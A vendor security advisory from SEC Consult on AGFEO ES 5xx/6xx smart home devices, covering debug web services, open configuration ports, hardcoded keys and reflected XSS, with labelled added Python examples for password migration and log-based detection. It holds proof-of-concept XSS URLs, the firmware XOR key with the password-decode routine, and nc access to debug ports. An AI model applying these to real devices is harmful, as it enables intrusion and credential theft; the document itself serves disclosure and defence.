SEC Consult SA-20170712-0 :: Multiple critical vulnerabilities in AGFEO smart home ES 5xx/6xx products

SEC Consult Vulnerability Lab Security Advisory < 20170712-0 >
=======================================================================
              title: Multiple critical vulnerabilities
            product: AGFEO Smart Home ES 5xx
                     AGFEO Smart Home ES 6xx
 vulnerable version: at least 1.9b, 1.10
      fixed version: 1.12c
         CVE number: -
             impact: Critical
           homepage: https://www.agfeo.de/
              found: 2016-12-28
                 by: T. Weber (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
AGFEO GmbH & Co. KG is a vendor of telephone systems and other
(tele-)communication products like DECT phones, headsets or smart home
products as well.


Business recommendation:
------------------------
The available patches should be installed immediately.

SEC Consult recommends not to use this product in a production environment
until a thorough security review has been performed by security professionals
as there are indications for further security issues.


Vulnerability overview/description:
-----------------------------------
1) Unauthenticated access to web services and authentication bypass
A web service with multiple scripts for debug purposes is accessible
on an unusual port on the device. There is also a script to read files from
the filesystem. As the web service runs with root privileges all files
on the operating system can be read by an attacker. This only affects the
ES 5xx product line, all other vulnerabilities affect both ES 5xx and 6xx.

The configuration of the device can be changed and arbitrary updates can be
uploaded as well as music files for the answering machine. By reading the
database content, the usernames and their passwords can be revealed and easily
decrypted. This way the administrator password can be dumped from the database
and the device can be fully administrated by an attacker.
The normal user interface has an additional development subfolder which was
probably used during the development process. Updates can be triggered from
this sub platform and log files, statistics and states can also be displayed.


2) Unauthenticated access to configuration ports
Multiple different instances of TCP services are present on the device. Each
of the listening sockets is forked from a debug and configuration service.
Internal device information can be read from the device. Among other commands,
the configuration of the device can also be altered by using these services.


3) Hardcoded cryptographic keys
Three certificates including their private keys are embedded in the firmware
of AGFEO ES 5xx/6xx SmartHome products. The certificates and keys in both
product lines are exactly the same. One certificate is used for HTTPS
(default server certificate for web based configuration and management).

Impersonation, man-in-the-middle or passive decryption attacks are possible.
These attacks allow an attacker to gain access to sensitive information like
admin credentials and use them in further attacks.


4) Multiple reflected cross site scripting (XSS) vulnerabilities
The ES 5xx SmartHome products are vulnerable to reflected cross site scripting.
Malicious JavaScript code can be executed in the browser of a victim by luring
them to a handcrafted link. This is possible even if the victim is not logged in.
It is assumed that the 6xx products are affected as well but those could not be
tested.


Proof of concept:
-----------------
1) Unauthenticated access to web services and authentication bypass
The debug web service is available by using the following url:
http://<Device-IP>:20011/index.html
There are different scripts accessible, the following actions can be executed:
    -) Change IP configuration
    -) Change time zone
    -) Upload updates (Any files can be uploaded to the device!)
    -) Read all files on the filesystem
    -) Play, delete and move voice messages on all mail boxes
    -) Converting mp3 files to wav files
    -) List all connected phones and the related numbers

The SQLite database is located under "/home/profile/poolstore.db". By reading
this file the usernames and passwords can be dumped. The passwords are encoded
with base64 and encrypted with XOR. To decrypt the XORed password the
following key has to be used:
    "0x42 0xab 0xce 0xfa 0x54 0xed 0xcf 0xba"

The function to decrypt the password was found in the php script "login.php":
function decodePassword($PasswordEnc)
{
    $PasswordBinaryEncBase64 = "";
    $PasswordBinaryEnc = "";
    $PasswordBinary = array();
    $Password = "";
    $lastChar = 0;

    $Key = array(0x42, 0xab, 0xce, 0xfa, 0x54, 0xed, 0xcf, 0xba);

    $PasswordBinaryEncBase64 = $PasswordEnc;

    // base64 decode
    $PasswordBinaryEnc = base64_decode($PasswordBinaryEncBase64);

    // xor decode
    for($i=0; $i<strlen($PasswordBinaryEnc); $i++) {
        $PasswordBinary[$i] = ord($PasswordBinaryEnc[$i]) ^ $Key[$i % count($Key)] ^ $lastChar;
        $lastChar = ord($PasswordBinaryEnc[$i]);
    }

    // remove first character (random char!)
    foreach ($PasswordBinary as $chr) {
      $Password .= chr($chr);
    }
    $Password = substr($Password, 1);
    // printf("%s:%d  Password %s\n", __FUNCTION__, __LINE__, $Password);

    return $Password;
}
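
Added example (not part of the advisory or of the vendor's code): a Python
port of the decode routine above next to a salted one-way replacement, with a
migration step that turns a reversible record into a hash. legacy_encode, the
"pbkdf2_sha256$..." record format and the iteration count are assumptions made
for this illustration.

```python
import base64
import hashlib
import hmac
import os

# XOR key quoted in the advisory (taken from login.php).
KEY = bytes([0x42, 0xAB, 0xCE, 0xFA, 0x54, 0xED, 0xCF, 0xBA])
ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor (assumed policy value)


def legacy_decode(stored: str) -> str:
    """Python port of decodePassword(): base64, chained XOR, drop first byte."""
    enc = base64.b64decode(stored)
    out, last = bytearray(), 0
    for i, c in enumerate(enc):
        out.append(c ^ KEY[i % len(KEY)] ^ last)
        last = c
    return out[1:].decode("latin-1")


def legacy_encode(password: str, pad: int) -> str:
    """Inverse of legacy_decode, inferred from it; builds constructed records."""
    enc, last = bytearray(), 0
    for i, p in enumerate(bytes([pad]) + password.encode("latin-1")):
        last = p ^ KEY[i % len(KEY)] ^ last
        enc.append(last)
    return base64.b64encode(enc).decode("ascii")


def hash_password(password: str) -> str:
    """One-way record: scheme$iterations$salt$digest, fresh salt per record."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, record: str) -> bool:
    _, iters, salt, dk = record.split("$")
    cand = hashlib.pbkdf2_hmac("sha256", password.encode(),
                               bytes.fromhex(salt), int(iters))
    return hmac.compare_digest(cand, bytes.fromhex(dk))


def migrate(record: str) -> str:
    """Replace a reversible legacy record with a hash; keep hashed ones."""
    if record.startswith("pbkdf2_sha256$"):
        return record
    return hash_password(legacy_decode(record))


if __name__ == "__main__":
    record = migrate(legacy_encode("S3cret!", pad=0x5A))  # constructed sample
    print(record, verify_password("S3cret!", record))
```

Anyone holding the firmware key can reverse a legacy record, while the
migrated record can only be checked against a candidate password.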

An additional subfolder, which contains debug scripts, is available under the
following location:
http://<Device-IP>/shdev/ui9.php

Updates can be triggered, logs can be shown and status messages can be gathered
within this functionality. Furthermore, it is possible to debug the login
process. Since there is a hardcoded user "admin" a brute force attack is also
possible.


2) Unauthenticated access to configuration ports
The following TCP ports can be accessed with "nc <Device-IP> -p <Port>":
19002, 19004, 19006, 19009, 19010, 19080, 19081
By connecting to one of these ports a debug interface spawns. For example the
connection to port 19081:
$ nc 192.168.0.40 19081
Start Menue: <Return>
========< UPDS - Menue >========
s:  show state
h:  help
D:  DEBmod on
d:  DEBmod off
L:  LOG on
l:  LOG off
S:  SERVICE-SUBMENUE
q:  Quit telnet session
========= NOT AKTIV ===========
s
status ausgeben (noch nicht vollstaendig implementiert)
upds <Timestamp>    bState: 00
upds <Timestamp>    bLastReceiveBlockNum: 15
[...]
S
upds <Timestamp>
upds <Timestamp>  ===== service-menue ======================
upds <Timestamp>  help                 help
upds <Timestamp>  q                    quit
upds <Timestamp>  D                    dial
upds <Timestamp>  d                    disconnect
upds <Timestamp>  ============ NOT AKTIV ===================
service submenue
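
Added example (not part of the advisory): a detection pass over gateway
firewall logs that flags TCP traffic to the ports listed above, and to the
debug web service port 20011, on known devices. The iptables-style log format,
the function name and the sample lines are assumptions; the log lines are
constructed.

```python
import ipaddress
import re

# TCP ports named in the advisory, mapped to the finding they belong to.
DEBUG_PORTS = {20011: "finding 1: debug web service (ES 5xx)"}
DEBUG_PORTS.update({p: "finding 2: debug/configuration port"
                    for p in (19002, 19004, 19006, 19009, 19010, 19080, 19081)})

KEYVAL = re.compile(r"(\w+)=(\S+)")

# Constructed iptables-style LOG lines; 192.168.0.40 is the device address
# used in the advisory's nc example, every other value is made up.
SAMPLE_LOG = [
    "Jul 12 10:00:01 gw kernel: IN=eth0 OUT=eth1 SRC=203.0.113.7 DST=192.168.0.40 PROTO=TCP SPT=51514 DPT=19081 SYN",
    "Jul 12 10:00:02 gw kernel: IN=eth1 OUT=eth1 SRC=192.168.0.15 DST=192.168.0.40 PROTO=TCP SPT=40022 DPT=443 SYN",
    "Jul 12 10:00:03 gw kernel: IN=eth1 OUT=eth1 SRC=192.168.0.15 DST=192.168.0.40 PROTO=TCP SPT=40023 DPT=20011 SYN",
    "Jul 12 10:00:04 gw kernel: IN=eth0 OUT=eth1 SRC=198.51.100.9 DST=192.168.0.40 PROTO=UDP SPT=5060 DPT=19002",
    "Jul 12 10:00:05 gw kernel: IN=eth0 OUT=eth1 SRC=198.51.100.9 DST=192.168.0.99 PROTO=TCP SPT=4000 DPT=19004 SYN",
    "Jul 12 10:00:06 gw kernel: truncated entry SRC=not-an-ip DPT=19081",
]


def flag_debug_port_traffic(lines, devices):
    """Return (src, dst, port, finding) for each TCP packet sent to one of the
    advisory's debug ports on a listed device. Malformed lines are skipped."""
    devices = {ipaddress.ip_address(d) for d in devices}
    hits = []
    for line in lines:
        f = dict(KEYVAL.findall(line))
        try:
            src = ipaddress.ip_address(f["SRC"])
            dst = ipaddress.ip_address(f["DST"])
            port = int(f["DPT"])
        except (KeyError, ValueError):
            continue
        if f.get("PROTO") == "TCP" and dst in devices and port in DEBUG_PORTS:
            hits.append((str(src), str(dst), port, DEBUG_PORTS[port]))
    return hits


if __name__ == "__main__":
    for hit in flag_debug_port_traffic(SAMPLE_LOG, ["192.168.0.40"]):
        print(hit)
```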


3) Hardcoded cryptographic keys
Refer to our study on hardcoded cryptographic secrets in embedded systems for
further information.
http://blog.sec-consult.com/2016/09/house-of-keys-9-months-later-40-worse.html
IoT Inspector (http://www.iot-inspector.com/) was used to identify this
vulnerability.

OpenSSL output for the certificate:
Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number: 10293758115057549292 (0x8edac6778bccbfec)
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=DE, ST=Some-State, L=Bielefeld, O=AGFEO GmbH & Co. KG, OU=Dev, CN=info/emailAddress=info@agfeo.de
        Validity
            Not Before: Oct 21 14:03:55 2014 GMT
            Not After : Mar  8 14:03:55 2042 GMT
        Subject: C=DE, ST=Some-State, L=Bielefeld, O=AGFEO GmbH & Co. KG, OU=Dev, CN=info/emailAddress=info@agfeo.de
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Exponent: 65537 (0x10001)
    Signature Algorithm: sha256WithRSAEncryption


4) Multiple reflected cross site scripting (XSS) vulnerabilities
The following crafted requests can be used to trigger the cross site scripting
vulnerability at different entry points:
http://<Device-IP>:20011/ais.php/%22%3E%3Cscript%3Ealert%28XSS%29%3C%2fscript%3E
http://<Device-IP>:20011/xtopbxwav.php/%22%3E%3Cscript%3Ealert%28XSS%29%3C%2fscript%3E
http://<Device-IP>:20011/update.php/%22%3E%3Cscript%3Ealert%28XSS%29%3C%2fscript%3E
http://<Device-IP>/pbxapi/licence.php/%3Cimg%20src=x%20onerror=alert%28XSS%29%3E
http://<Device-IP>/pbxapi/eoimport.php/%3Cimg%20src=x%20onerror=alert%28XSS%29%3E
http://<Device-IP>/pbxapi/knximport.php/%3Cimg%20src=x%20onerror=alert%28XSS%29%3E
http://<Device-IP>/pbxapi/hmimport.php/%3Cimg%20src=x%20onerror=alert%28XSS%29%3E
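
Added example (not part of the advisory): detection logic for the request
shape used in the URLs above, where markup is appended as extra path segments
after a .php script name. It assumes requests to the device pass a proxy that
writes Common Log Format lines; the function names and the log lines are
constructed for this example.

```python
import re
from urllib.parse import unquote

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Script path ending in .php, followed by extra path segments (PATH_INFO).
PATH_INFO = re.compile(r"^(/[^?#]*?\.php)/([^?#]+)", re.IGNORECASE)
MARKUP = re.compile(r"[<>\"']")

# Constructed access-log lines. The first two requests reuse payloads from the
# advisory's PoC URLs; addresses, timestamps and sizes are made up.
SAMPLE_LOG = [
    '192.168.0.15 - - [12/Jul/2017:10:00:00 +0000] "GET /pbxapi/licence.php/%3Cimg%20src=x%20onerror=alert%28XSS%29%3E HTTP/1.1" 200 512',
    '192.168.0.15 - - [12/Jul/2017:10:00:01 +0000] "GET /update.php/%22%3E%3Cscript%3Ealert%28XSS%29%3C%2fscript%3E HTTP/1.1" 200 734',
    '192.168.0.15 - - [12/Jul/2017:10:00:02 +0000] "GET /ais.php/%2522%253E%253Cscript%253E HTTP/1.1" 200 701',
    '192.168.0.22 - - [12/Jul/2017:10:00:03 +0000] "GET /pbxapi/licence.php?id=3 HTTP/1.1" 200 420',
    '192.168.0.22 - - [12/Jul/2017:10:00:04 +0000] "GET /index.php/settings/users HTTP/1.1" 200 1980',
]


def fully_unquote(value, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded markup is seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_path_info(lines):
    """Return (script, decoded_path_info) for requests whose path segments
    after a .php script contain HTML metacharacters once decoded."""
    hits = []
    for line in lines:
        request = REQUEST.search(line)
        if not request:
            continue
        parts = PATH_INFO.match(request.group(1))
        if not parts:
            continue
        extra = fully_unquote(parts.group(2))
        if MARKUP.search(extra):
            hits.append((parts.group(1), extra))
    return hits


if __name__ == "__main__":
    for script, extra in suspicious_path_info(SAMPLE_LOG):
        print(script, "<-", extra)
```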


Vulnerable / tested versions:
-----------------------------
One firmware is available for the whole ES 5 product line, and another one for
the product line ES 6. Therefore, all vulnerabilities which have been found in
one product of ES 5/6 are also available in all other products of ES 5/6.

The following product / firmware version has been tested by SEC Consult:
ES 512 Version 1.9b (es5xxv19b_c063be6)
ES 512 Version 1.10 (es5xxv110_f105485)

Based on results of the SEC Technologies IoT Inspector
(http://www.iot-inspector.com/ - automated firmware analysis tool) we believe
that the product line ES 6 is also prone to the identified vulnerabilities
(except the web service on port 20011) as well as product line ES 5.

Firmware Version 1.9b (ES6xxv19b_c063be67b9c2ba)
Firmware Version 1.10 (ES6xxv110_f105485715a360)


Vendor contact timeline:
------------------------
2017-01-10: Contacting vendor through info@agfeo.de and set release date
            to 2017-03-01 according to SEC Consult responsible disclosure
            policy.
2017-01-12: Contact asks for getting the security advisory unencrypted.
            Sending security advisory unencrypted.
2017-01-17: Call with vendor. Vendor is working on a fix of the found
            vulnerabilities.
2017-02-06: Asking for status update via mail; Contact responds that
            most of the vulnerabilities are fixed and a new version will
            be available soon.
2017-02-22: Asking for status update via mail. Contact responds that
            a new firmware is available soon.
2017-02-24: New firmware version is 1.12 for ES 5/6 series.
2017-02-28: The firmware will be available in CW11. Shifting release of
            advisory to 2017-03-15.
2017-03-13: Asked for a status update.
2017-03-14: Vendor responds that the update will be available on
            2017-03-21. Shifted release to 2017-03-21.
2017-03-20: Asked vendor when the updated firmware is available as
            download; Vendor responds that the updated firmware which
            contains fixes for all vulnerabilities can be received after
            contacting their Hotline. They also stated that the update
            will be available on the homepage in the next few days.
            Informed the vendor that the advisory will be published
            when the update is available on the homepage in the next
            few days. Shifted release to CW14.
2017-04-05: Asked for status update. Vendor responds that firmware will
            be available next week. Shifted release to unknown.
2017-04-24: Asked whether the download is available or not. Firmware
            will be available next week.
2017-04-25: Found new version 1.12a for ES 6xx on vendor home page.
2017-05-26: Found new version 1.11a for ES 5xx on vendor home page.
2017-05-29: Asked whether the current firmware contains all the fixes.
            Vendor responds that only a part of the vulnerabilities
            is fixed. They also state that v1.12b for all products
            except "ES5xx up" will be available this week. This
            firmware contains all fixes.
2017-06-06: Asked vendor for the actual state, because the contact said
            that all vulnerabilities are fixed and the firmware can be
            received after calling the hotline. Asked vendor which
            vulnerabilities are actually fixed; No answer.
2017-06-14: Informed vendor that the advisory will be published on
            2017-07-12 because of the long "ping-pong" game without
            real outcome.
2017-06-22: Contact stated that version 1.12c will be available next
            week.
2017-07-03: Found new version 1.12c for ES 5/6/7 on vendor home page
            (available since 2017-06-30).
2017-07-12: Coordinated release of security advisory.


Solution:
---------
Call AGFEO hotline (+49 521 44709-0) or log in to the vendor home page
to get the newest firmware version.


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.


Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF T. Weber / @2017

